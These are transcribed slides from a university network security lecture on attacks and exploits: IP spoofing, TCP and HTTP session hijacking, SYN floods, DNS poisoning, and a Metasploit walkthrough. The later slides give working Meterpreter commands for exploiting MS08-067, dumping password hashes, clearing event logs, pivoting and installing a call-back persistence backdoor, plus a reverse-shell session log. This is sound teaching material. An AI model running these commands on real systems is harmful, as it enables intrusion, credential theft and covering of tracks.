cpsc 6128 - network security 1 network security cpsc6128 – lecture 3 attacks, vulnerabilities and...
TRANSCRIPT
CPSC 6128 - Network Security 1
Network Security
CPSC6128 – Lecture 3Attacks, Vulnerabilities and Exploits
CPSC 6128 - Network Security
Network Attack Methodology
Recon – Information gathering
Scanning – Enumeration
Vulnerability Identification
Exploit Gaining access Elevating given access Application/Web level attacks Denial of Service (DOS)
2
• Post ExploitationMaintaining AccessRemoving Forensic EvidenceExfiltration
TODAY’S LECTURE
CPSC 6128 - Network Security
GENERAL NETWORK ATTACK TECHNIQUES
3
CPSC 6128 - Network Security
IP address spoofing (1)
Attacker doesn’t want actions traced back Simply re-configure IP address in Windows or Unix. Or enter spoofed address in an application
e.g., decoy packets with Nmap
4
212.68.212.7145.13.145.67
SA: 36.220.9.59DA: 212.68.212.7
CPSC 6128 - Network Security5
IP address spoofing (2)
But attacker cannot interact with victim Unless attacker is on path between victim and spoofed address
212.68.212.7145.13.145.67 SA: 36.220.9.59DA: 212.68.212.7
36.220.9.59
SA: 212.68.212.7DA: 36.220.9.59
attacker
victim
CPSC 6128 - Network Security
IP spoofing with TCP?
Can an attacker make a TCP connection to server with a spoofed IP address?
Not easy Sequence Numbers are negotiated between sender and
receiver to insure that packets are part of an established connection
If attacker can guess initial sequence number, can attempt to inject into the conversation
But TCP uses random initial sequence numbers Poor implementations of TCP, however
can allow for the sequence #’s to be predictable
6
CPSC 6128 - Network Security 7
Defense: Egress/Ingress filtering
127.32.1.1 x
Internet
222.22/16
127.32.1.1 x
Internet
222.22/16
Egress Filtering
Ingress Filtering
CPSC 6128 - Network Security 8
Ingress Filtering: Upstream ISP (1)
12.12/24
34.34/24
56.56/24
78.78/24
BGP update:12.12/24,34.34/24
BGP update:56.56/24,78.78/24
regionalISP
regionalISP
tier-1 ISP
CPSC 6128 - Network Security 9
Ingress Filtering: Upstream ISP (2)
12.12/24
34.34/24
56.56/24
78.78/24
BGP update:12.12/24,34.34/24
BGP update:56.56/24,78.78/24
Filter all traffic but 12.12/24
and 34.34/24
Filter all traffic but 56.56/24
and 78.78/24
CPSC 6128 - Network Security 10
Ingress Filtering: Upstream ISP (3)
12.12/24
34.34/24
56.56/24
78.78/24
Filter all but 12.12/24 and
34.34/24
Filter all but 56.56/24 and
78.78/24
56.56.1.1
regional
ISP
regional
ISP
tier-1 ISP
x
CPSC 6128 - Network Security 11
Ingress Filtering: Upstream ISP (4)
12.12/24
34.34/24
56.56/24
78.78/24
Filter all but 12.12/24 and
34.34/24
Filter all but 56.56/24 and
78.78/24
34.34.1.1 regional
ISP
regional
ISP
tier-1 ISP
spoofedpacket gets
through!
CPSC 6128 - Network Security Attacks
12
Ingress/Egress filtering: Summary
Effectiveness depends on widespread deployment at access ISPs
Deployment in upstream ISPs helps, but does not eliminate IP spoofing
Even if universally deployed at access, hacker can still spoof another address in its access network 12.12/24
See RFC 2827 “Network Ingress Filtering: Defeating DDoS”
CPSC 6128 - Network Security 13
TCP Session Hijacking A technique used to gain access to Internet
servers It was first used by Kevin Mitnick to gain access to
Tsutomu Shimomura's workstation in 1995 Take control of one side of a TCP connection Marriage of sniffing and spoofing
Alice telnet
“hi, I’m
Alice”Alice
Bob
Attacker
CPSC 6128 - Network Security 14
TCP Session Hijacking: Limitation
3. “thanks
bob”Alice Bob
Attacker
1. weird ACK # for data never sent
2. to resync, Alicesends segment with
correct seq #
Bob is getting segmentsfrom attacker and Alice.Source IP address same,but seq #’s different. Bob likely drops connection.
Attacker’s solutions:1) Overwrite IP-to-MAC ARP tables, then Alice’s segments will not reach Bob and vice-versa2) DOS attack Alice so her machine won’t see erroneous replies from Bob3) Older method was to use IP source routing to route packets back to attacker
CPSC 6128 - Network Security 15
Session hijacking: The details Attacker and Alice are on the same network segment
where traffic passes from Alice to Bob, as well as to the attacker Attacker can sniff the packets And See TCP packets between Bob and Alice and their sequence numbers
Attacker jumps in, sending TCP packets to Bob source IP address = Alice’s IP address Bob now obeys commands sent by attacker, thinking they were sent by Alice
Principal defense Encryption with authentication protocol Attacker does not have keys to decrypt and insert meaningful traffic
How about Attacker and Alice are not on the same network Segment? Very complex, please read the handout –TCP Session Hijacking
Tools used Juggernaut (Linux) Hunt (Unix based) T-Sight (Windows OS)
CPSC 6128 - Network Security 16
HTTP Session Hijacking:
HTT
P Ses
sion
ID: A
DEF7
8DDC
543D
DDE
Client Web Server
Attacker
HTTP Session ID: ADEF78DDC543DDDE
Involves obtaining the HTTP Session ID The ID can be found in cookies and URLs
Called Sidejacking if sniffed
CPSC 6128 - Network Security 17
Firesheep – HTTP Sidejacking ---Not downloaded, but handout.
CPSC 6128 - Network Security 18
Denial-of-Service Attacks
Vulnerability attack Send a few crafted messages to target app that has vulnerability Malicious messages called the “exploit” Remotely stopping or crashing services
Connection flooding Overwhelming connection queue with SYN flood
Bandwidth flooding attack Overwhelming communications link with packets Strength in flooding attack lies in volume rather than content
Prevent access by legitimate users or stop critical system processes
CPSC 6128 - Network Security 19
DoS and DDoS
DoS: source of attack small # of nodes source IP typically spoofed
DDoS From thousands of nodes IP addresses often not spoofed Often implemented as a Botnet
CPSC 6128 - Network Security 20
Interlude: IP datagram format
ver length
32 bits
data (variable length,typically a TCP
or UDP segment)
16-bit identifier
Internet checksum
time tolive
32 bit source IP address
header length (bytes)
max numberremaining hops
(decremented at each router)
forfragmentation/
reassembly
total datagramlength (bytes)
upper layer protocolto deliver payload to
head.len
type ofservice
“type” of data flgs fragment offset
upper layer
32 bit destination IP address
Options (if any)
CPSC 6128 - Network Security 21
IP Fragmentation and Reassembly
ID=x
offset=0
fragflag=0
length=4000
ID=x
offset=0
fragflag=1
length=1500
ID=x
offset=185
fragflag=1
length=1500
ID=x
offset=370
fragflag=0
length=1040
One large datagram becomesseveral smaller datagrams
Example 4000 byte datagram MTU = 1500 bytes
1480 bytes in data field
offset =1480/8
CPSC 6128 - Network Security 22
DoS: examples of vulnerability attacks
Land: sends spoofed packet with source and dest
address/port the same
Ping of death: sends oversized ping packet
Jolt2: sends a stream of fragments, none of which
have fragflag set to 0. Rebuilding consumes all processor capacity.
Teardrop, Newtear, Bonk, Syndrop: tools send overlapping segments, that is,
fragment offsets incorrect.
Patches fix the problem,but malformed packet attacks continue to be
discovered.
CPSC 6128 - Network Security 23
Connection flooding: Overwhelming connection queue w/ SYN flood
Send SYN packet Recall client sends SYN packet with initial
seq. number when initiating a connection. Allocate Memory
TCP on server machine allocates memory on its connection queue, to track the status of the new half-open connection.
Wait for ACK For each half-open connection, server waits
for ACK segment, using a timeout that is often > 1 minute
Attack Send many SYN packets Fill up connection queue with half-open
connections Can spoof source IP address When connection queue is exhausted
no new connections can be initiated by legit users.
CPSC 6128 - Network Security 24
DoS: Overwhelming connection queue with SYN flood
victim
attacker
Alice
SYNs withSource IP = Alice
SYN-ACKs
RST
Connection queuefreed up with RST segment
Amateur attack:
Expert attack: Use multiple source IP Addresses Each from unresponsive addresses
CPSC 6128 - Network Security 25
SYN flood defense: SYN cookies (1)
When SYN segment arrives, server calculates function (hash) based on:
Source and destination IP addresses and port numbers, MSS (Max Segment Size) and a slowly incrementing timestamp
Hash Output 32 bits
Server uses resulting “cookie” for its initial seq # (ISN) in SYNACK
Server does not allocate anything to half-open connection: Does not remember client’s ISN Does not remember cookie
Client Web Server
SYN with ISNA
SYN-ACK with ISNB= cookie
CPSC 6128 - Network Security 26
SYN flood defense: SYN cookies (2)
If SYN is legitimate Client returns final ACK w/
Seq# = ISN(of server)+1
Server computes same function, verifies function = SEQ # in ACK segment
Legit connection established without the need for half-open connections
If SYN-flood attack with spoofed IP address No ACK comes back to server
for connection.
No problem server is not waiting for an ACK and has
no resources allocated
CPSC 6128 - Network Security 27
Another Attack: Overwhelming link bandwidth with packets
Attack traffic can be made similar to legitimate traffic, hindering detection.
Flow of traffic must consume target’s bandwidth resources
Attacker needs to engage more than one machine => DDoS
May be easier to get target to fill-up its upstream bandwidth: async access
CPSC 6128 - Network Security 28
Example: Distributed DoS
Internetattacker
victim
bot
bot
bot
bot
Attacker takes over many machines, called “bots”. Potential bots are machines with vulnerabilities.
bot processes wait for command from attacker to flood a target
CPSC 6128 - Network Security 29
Example: LOIC (try it)
CPSC 6128 - Network Security 30
DDoS using DNS Server----Amplification Attack
attacker
victim
DNS server
DNS server
DNS server
DNS server
request
request
request
request
reply
reply
reply
reply
Source IP = Victim’s IP
CPSC 6128 - Network Security 31
DDoS: Amplification Attack
Spoof source IP address = victim’s IP
Goal: generate lengthy or numerous replies for short requests:
Amplification
Amplification Attack can also be done with Web and other services
CPSC 6128 - Network Security 32
DDoS DefensesDon’t let your systems become
bots Keep systems patched up Employ egress anti-spoof filtering
on external router
Filter dangerous packets To avoid vulnerability attacks Using Intrusion prevention systems
Over-provisioning of resources Abundant bandwidth Large pool of servers ISP needs abundant bandwidth too Multiple ISPs
Signature and anomaly detection and filtering
Rate limiting Limit # of packets sent
from source to dest
CPSC 6128 - Network Security
33
DNS attacks
Reflector attack Leverage DNS for attacks on arbitrary targets - DDOS
Denying DNS service Stop DNS root servers Stop top-level-domain servers (e.g. .com domain) Stop local (default name servers)
Use fake DNS replies to redirect user
Poisoning DNS Insert false resource records into various DNS caches False records contain IP addresses operated by attackers
CPSC 6128 - Network Security
34
DDOS DNS Attack Against Root ServersExample
Oct 21, 2002 Ping packets sent from bots to the 13 DNS root servers Goal: bandwidth flood servers
Minimize impact: DNS caching Rate limiting at upstream routers: filter ping when they arrive at an excessive rate
Root server attack is easy to defend Download root server database to local (default) name servers Not much data in root server; changes infrequently
Similar kind of attack attempted in March 2012
CPSC 6128 - Network Security 35
DNS attack: redirecting
network
attacker
client local DNSserver
hub orWiFi 1
2
1. Client sends DNS query to its local DNS server; sniffed by attacker
2. Attacker responds with bogus DNS reply
Issues: Must spoof IP address
Set to local DNS server (easy)
Must match reply ID with request ID Easy
May need to stop reply from the local DNS server harder
CPSC 6128 - Network Security 36
Poisoning DNS Cache
Poisoning Attempt to put bogus records into DNS name server caches Bogus records could point to attacker nodes Attacker nodes could phish
But unsolicited replies are not accepted at a name serverName servers use IDs in DNS messages to match replies to queriesSo can’t just insert a record into a name server by sending a DNS reply message.
But can send a reply to a request.
CPSC 6128 - Network Security 37
Poisoning local DNS server
Local ISP DNSServer for Client
Attacker17.32.8.9
1. DNS querywww.csu.edu=?
3. DNS replywww.csu.edu= 17.32.8.9
2. iterativeDNS queries
authoritativeDNS for csu.edu
Goal: Put bogus IP address for poly.eduin local Berkeley DNS server1) Attacker queries local DNS server2) Local DNS makes iterative queries3) Attacker waits for some time;sends a bogus reply, spoofing authoritative server for csu.edu.
Client ConnectingRemotely to CSU
csu = ColumbusState
CPSC 6128 - Network Security 38
Poisoning local DNS server (cont)
Local ISP DNSServer for Client
Attacker17.32.8.9
1. DNS query www.csu.edu=?
2. DNS responsewww.csu.edu=17.32.8.9
authoritativeDNS for csu.edu
DNS response can provide IPaddress of malicious server!
Client ConnectingRemotely to CSU
3. http connection to 17.32.8.9
CPSC 6128 - Network Security 39
DNS Poisoning (cont)
Issues:
Attacker needs to know sequence number in request message sent to upstream serverNot easy!
Attacker may need to stop upstream name server from respondingSo that server under attack doesn’t get suspiciousPing of death, DoS, overflows, etc
CPSC 6128 - Network Security 40
DNS attacks: Summary
DNS a critical component of the Internet infrastructure
But is surprisingly robustDDoS attacks against root servers have been largely unsuccessfulPoisoning and redirecting attacks are difficult unless you can sniff DNS requestsAnd even so, may need to stop DNS servers from replying
DNS can be leveraged for reflection attacks against non-DNS nodes
CPSC 6128 - Network Security
TOOLS AND ATTACK IMPLEMENTATION
41
CPSC 6128 - Network Security 42
Vulnerability Scanners Vulnerability
a software bug or mis-configuration allowing for unauthorized access
Original vulnerability scanner It was called SATAN (Security Admin Tool for Analyzing Networks) Written by Dan Farmer in 1995 employed by SGI at the time Very controversial when released It eventually resulted in SGI firing Dan Farmer
Commercial scanners (currently) ISS Internet Scanner SAINT Retina by eEye Nessus by Tenable
CPSC 6128 - Network Security 43
Nessus Nessus project started by Renaud Deraison in 1998
Very popular vulnerability scanner
Oct 2005 founded Tenable security and changed to “closed source”
Still free but with limited signature set
OPEN-VAS is a fork of the original Nessus code and is still open source at http://www.openvas.org
CPSC 6128 - Network Security
Nessus Architecture
44
CPSC 6128 - Network Security
Nessus Plugin Selection
45
CPSC 6128 - Network Security
Nessus Scan Results
46
CPSC 6128 - Network Security
Web Vulnerability Scanners
47
Nikto Most popular Looks for default files and configs and well as server misconfiguration Provides versioning information Runs on Linux or Windows http://www.cirt.net
CPSC 6128 - Network Security
Nikto
48
CPSC 6128 - Network Security
Exploits Bought and Sold
CPSC 6128 - Network Security
Exploitation Tools
50
Immunity Canvas Commercial http://www.immunitysec.com
Core Impact Commercial http://www.coresecurity.com
Metasploit Open Source: http://www.metasploit.org recently acquired by Rapid7
CPSC 6128 - Network Security
Immunity Canvas
51
Runs on Windows, OS X or Linux (Linux recommended)
Currently over 370 exploits with an average of 4 exploits added each month
Flexible payload options Connect to sock or “call back” MOSDEF session allows for arbitrary code execution Can get screenshots, video, keylogging, etc.
CPSC 6128 - Network Security
Canvas Interface
52
CPSC 6128 - Network Security
Canvas Interface
53
Red – Modules – Things that Canvas can doPurple – Things that Canvas know aboutYellow – Status Window, what Canvas is currently doing
CPSC 6128 - Network Security
Canvas
54
Set Target
CPSC 6128 - Network Security
Canvas – Port Scan
55
Canvas has reconnaissance tools and vulnerability assessment tools built in These can be supplemented by imports from other tools such as Nessus Here we can see that the scan reveals the usual Windows ports open
CPSC 6128 - Network Security
Canvas – Exploits
56
Lets try a SMB exploit
CPSC 6128 - Network Security
Canvas – Launch Exploit
57
CPSC 6128 - Network Security
Canvas – Success We Have Shell!
58
CPSC 6128 - Network Security 59
The Metasploit Framework
Open Source Development Framework for Penetration testing Patch verification Regression testing Security Research
Runs on Linux, Mac OS X, BSD, Windows Remote and local exploits Browser exploits Ability to create exploits Developed by HD Moore Recently “acquired” by Rapid7 All indications are that it will remain open source
CPSC 6128 - Network Security
Terms Vulnerability
weakness in a system which allows an attacker to reduce the systems security posture
Exploit Code which allows an attacker to take advantage of the
vulnerability in the system Payload
The code which is delivered by the exploit This is the code which actually runs on the victim system Post exploitation
Encoders Way to obfuscate the payload code so that anti-virus and IDS
won’t detect Module
A small piece of code to that can be added to the Metasploit Framework to execute an attack
Auxiliary Module other parts of Metasploit that aid in exploitation such as scanners
CPSC 6128 - Network Security
Why Metasploit Framework?
Individual exploit code hard to manage, update and customize
No code reuse
With a framework there is no need to customize exploits to match payload code
Mix and match exploits and payloads easily
Rapid development of new exploit code
CPSC 6128 - Network Security 62
Architecture Overview
Libraries
ModulesInterfaces
Custom Plugins
msfapi
msfgui
msfconsole
msfcli
msfweb
auxiliary
nops
encoders
payloads
exploits
Framework:Base
Framework:Core
REX
Interfaces
Interfaces
Interfaces
Protocol Tools
Security Tools
Web Services
Integration
Diagram by HDMoore/MSF
CPSC 6128 - Network Security
Different types of Payload Inline
A single payload containing the exploit and full shellcode for the selected task Inline payloads are by design more stable than their counterparts because they contain everything all in one However, some exploits won’t support the resulting size of these payloads
Staged Many exploitable situations constrain how many bytes an attacker may load into one contiguous location in
memory One way to do interesting post exploitation in these situations is to deliver the payload in stages
Reverse Instead of the attacker connecting to the payload on the exploited host The payload on the exploited host connects back to the attacker Good for inside firewalls.
NoNx The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of
memory. In Windows, NX is implemented as Data Execution Prevention (DEP) The Metasploit NoNX payloads are designed to circumvent DEP
PassiveX A payload that can help in circumventing restrictive outbound firewalls It does this by using an ActiveX control to create a hidden instance of Internet Explorer Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses
CPSC 6128 - Network Security
More About Payloads (cont)
IPv6 IPv6 payload designed to work over IPv6
Meterpreter Short for Meta-Interpreter an advanced, multi-faceted payload that operates via DLL injection resides completely in the memory of the remote host leaves no traces on the hard drive making it very difficult to detect with conventional forensic techniques
CPSC 6128 - Network Security
Meterpreter Meta-Interpreter Advanced payload which operates via DLL injection Resides completely in memory No hard disk writes at all Scripts and plugins supported Well supported and constant development Encrypted communications between the attacker and payload
Remote command execution In-memory process migration Registry modifications Pivoting File system support and more
CPSC 6128 - Network Security 66
How it Works
Payload Connects back to MSF
MSF Sends Meterpreter Server DLL
2nd Stage DLL Injection Payload Sent
Exploit + 1st Stage Payload
Client and Server Communicate
CPSC 6128 - Network Security
Metasploit Interfaces
MSFGUI MSFWeb MSFCLI
MSFd MSFConsole Armitage
CPSC 6128 - Network Security
MsfConsole
68
CPSC 6128 - Network Security
MsfConsole Basics
69
Interactive console for Metasploit Tab completion (double tap) to help type Can execute external commands Most flexible interface
CPSC 6128 - Network Security
Directory Structure
70
Modules What we will mainly be working with Contain Exploits, auxiliary, encoders
Scripts extension scripts Typically from 3rd parties. “run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts)
Plugins location for your own exploits development
External interfaces to external services such a serial port
Data data source for exploits dictionaries, wordlists, sql, snmp mibs, etc.
CPSC 6128 - Network Security
Modules
71
Auxiliary tasks outside of direct exploitation such as port scanning, sniffing, etc
Encoders various techniques for obfuscating payloads to avoid antivirus and IDS
Exploits organized by OS Ruby scripts containing the exploit code
Nops nop sleds for various CPU architecture
Post post exploitation scripts for data gather, exfiltration
Payloads 3 types (singles, stagers, stages) OS specific
CPSC 6128 - Network Security
Exploitation Basics-search exploits Identify vulnerability
based on recon and possible output from vulnerability scanner (Nessus)
Choose exploit which can take advantage of that vulnerability
Use “search” example using MS08-067
Play techno music in background
CPSC 6128 - Network Security
Exploitation Basics—use exploits “use” command followed by directory path
“use exploit/windows/smb/ms08_067_netapi”
Use tab completion double tap
Display options required for exploit “show options”
CPSC 6128 - Network Security
Exploitation Basics—Set PAYLoad Select PAYLOAD
to deliver after successful exploitation Can use tab completion to show options “set PAYLOAD windows/meterpreter/bind_tcp”
bind_tcp will listen for attacker to connect Reverse payload will connect back to the attacker
CPSC 6128 - Network Security
Exploitation Basics—Set RHOST “show options” now shows PAYLOAD options “set” command will set the options “set RHOST 172.16.156.132
CPSC 6128 - Network Security
Exploitation Basics –Finally, exploit “exploit” to run exploit
Will open a session to target with prompt “meterpreter>” “background” will send session to the background “session –i 1” will return to the first session “execute –f cmd.exe –i –H” will have remote shell
CPSC 6128 - Network Security
Now What? - Post Exploitation Meterpreter Basics
Migrate migrates the meterpreter DLL injection to a different process Explorer.exe is a good choice
Sysinfo displays information about the target system
Download “download c:\\boot.ini” - downloads from the target machine Note double slashes
Upload “upload c:\\boot.ini c:\\windows\system32”, or “upload c:\\boot.ini yang” uploads file to the target machine
Getuid returns the userid (permissions) that meterpreter is running
Execute “execute –f cmd.exe –i –H” runs command on the remote machine “–i” runs the command interactively “-H’ hides the process from user
hashdump dumps the SAM database for offline cracking
Clearev clears the windows events logs
MUCH MORE See: http://www.offensive-security.com/metasploit-unleashed/
CPSC 6128 - Network Security
Pivoting Using one compromised machine to further exploit
other hosts or networks Example would be a client side “drive by browser”
attack Once the attacker owns this machine inside the firewall they can launch all further attacks from this compromised machine
CPSC 6128 - Network Security
Add Route to an exist session Add route from attacker machine to remote network “route add 10.100.100.0 255.255.255.0 1”
adds a route to the remote network through meterpreter session 1 Further attacks to 10.100.100.0 will traverse this session and the already exploited host
CPSC 6128 - Network Security
Persistence If remote target reboots
meterpreter session is lost
Might be ok if exploit is reliable Just run again However, this is usually not the case
Two ways to perform persistence with Meterpreter• Persistence script• Metsvc
• Set up a backdoor at the remote machine use “run metsvc –A”• Remove backdoor use “run metsvc –r”
CPSC 6128 - Network Security
Persistence Script Creates persistent backdoor
which can be configured to connect back to attacker on system boot
Creates a vbs file and registry key Can be uninstalled remotely “run persistence –A –L c:\\windows\system32 –X –i
10 –p 443 –r 192.168.1.10”
CPSC 6128 - Network Security
Metsvc backdoor Backdoor runs as a service on the target
Attacker can connect to it remotely Less noisy compared to persistence script
CPSC 6128 - Network Security
“3rd Party” Rootkits
Used for more advanced post exploitation Hiding process, files, data exfil. http://www.rootkit.com HackerDefender
written by Holy Father Kernel mode rootkit Holy Father offered custom builds of HD to bypass AV/IDS Well understood – so we may use this in lab
CPSC 6128 - Network Security
Client Side Exploits
Network side exploits are becoming more and more rare Attackers have moved to “client side” exploits Client-side exploits leverage software/applications
running on the target system Browser based attacks are common Java also significant attack vector
CPSC 6128 - Network Security
Example Client Side Exploit
85
CPSC 6128 - Network Security
Example Client Side Exploit
msf> exploit(apple_itunes_playlist) > exploit[*] Started reverse handler[*] Using URL: http://10.10.11.10:8080/mycoolplaylist.pls[*] Server started.[*] Exploit running as background job.
msf> exploit(apple_itunes_playlist) > [*] Sending stage (474 bytes)[*] Command shell session 1 opened (10.10.21.10:65535 ->
192.168.113.10:1075)
msf> exploit(apple_itunes_playlist) > sessions -i 1[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\System32\>
86
CPSC 6128 - Network Security
Armitage
87
CPSC 6128 - Network Security
Starting Type “armitage” from Backtrack
Defaults ok
Will start Metasploit and auto connect. Click YES when prompted to start Metasploit
88
CPSC 6128 - Network Security
Scanning Nmap built in
MSF scans are Metasploit built in scanning modules. Generally Nmap is better
All found targets are automatically added to the target window
89
CPSC 6128 - Network Security
Exploitation Apply “Find Attack” either by Port or by Vulnerability first
Right click target will bring up possible exploits
Can also specify exploits and modules from the right hand menu
90
CPSC 6128 - Network Security
Exploitation When host is compromised it appears RED with Lighting
Select “Interact”, then Command Shell access
91
CPSC 6128 - Network Security
Next Time
Covering your tracks….
92